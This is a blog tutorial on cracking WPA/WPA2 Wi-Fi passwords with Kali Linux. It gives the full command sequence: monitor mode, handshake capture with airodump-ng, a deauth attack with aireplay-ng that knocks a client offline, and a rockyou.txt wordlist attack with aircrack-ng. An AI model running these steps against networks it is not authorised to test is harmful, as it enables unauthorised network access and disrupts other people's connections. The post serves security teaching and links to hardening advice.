Network Penetration Testing — Gaining Access — 2
In this blog, we will learn how to decrypt WPA/WPA2 connections using a single method.
2. WPA/WPA2 (WI-FI Protected Access) -
All of the back-doors / weaknesses found in WEP have been solved in this encryption, making it difficult to decipher. Here each packet is encrypted using a unique temporary key even though if we make it possible to decrypt that temporary key and gain access to packets they contain no important data.
To decrypt this encryption, we must use a world-list attack, also known as a brute-force attack.To perform a brute-force attack, we need to capture a handshake, which can be captured when a device is connected to a machine. No worries, we can capture handshake by performing a deauth attack on an existing user. This attack will disconnect the user for a second, which will not be identical to the user, but we will be able to capture handshake. This handshake does not contain data that can be used to extract the key, but it may be used to determine whether the key is valid.
Now it’s time to switch on the beast ( Kali Linux ) , as is traditional…..
Put your WiFi adapter in monitor mode as well.
If you don’t know how to do so, I recommend reading my earlier blog first.
First, we must execute airodump-ng in order to capture the handshake — airodump-ng -bssid (routers mac address) -channel (channel no.) -write wpa_handshake-01 wlan0
The router’s mac address must be entered in -bssid, and the channel number must be entered in -channel no. We can retrieve all of this information by using the command airodump-ng wlan0. Now, in order to capture the packet, a device should be get connected to the target after we run the first command. We may use the deauth command to do this. aireplay-ng -deauth 4 -a (mac add of router) -c (mac add of target device) wlan0 We used aireplay-ng to quickly disconnect and reconnect a user, allowing us to capture the handshake which will help us to see whether the key is valid or not. Here in command -deauth 4 is used as time to keep user disconnect from router if we increase the number user will be not able to connect the router.
Now that we’ve captured the handshake, we can do a brute-force / word-list attack. To do so, we’ll need to generate a word-list, which you can get on the web or one can create his own using tools like cupp. For now, we’ll use the default word-list provided by Kali Linux, which is rockyou.txt it is located in /usr/share/wordlists.
Now we’re ready for the last attack. To run the attack, we’ll need to run aircrack-ng. The command is as follows: aircrack-ng wpa_handshake-01.cap -w (word-list)
We must first give the world-list name in -w, and then ensure that the word-list is present in the home directory. And then run the command. Now if the word-list is huge it will take some time if your word-list does not contain the password try using different wordlists.
Now, if you don’t want to be a part of this attack and want to safeguard yourself and your router, read this: https://tanishqshahsays.wordpress.com/2020/12/10/how-to-secure-wi-fi/
The codes we used -
- ifconfig wlan0 down
- airmon-ng check kill
- iwconfig wlan0 mode monitor
- ifconfig wlan0 up
- airodump-ng wlan0
- airodump-ng -bssid (routers mac address) -channel (channel no.) -write {wpa_handshake-01} wlan0
- aireplay-ng -deauth 4 -a (mac add of router) -c (mac add of target device) wlan0
- aircrack-ng {wpa_handshake-01.cap} -w (wordlist)
Brain Tattoo:-
- All the back-doors in wep network are secured in wpa/wp2.
- To break into wpa/wpa2 network we have to perform a word-list/brute-force attack.
- We can’t break into network by just capturing packets.
- Packets are captured when a device gets connected to network to do so we use deauth attack.
- Using that packets we can check whether the password is valid or not.
DISCLAIMER: This Blog Does NOT Promote or encourage Any illegal activities, all contents provided by This blog is meant for EDUCATIONAL And Informational PURPOSE only. We will not be responsible for your any illegal actions.
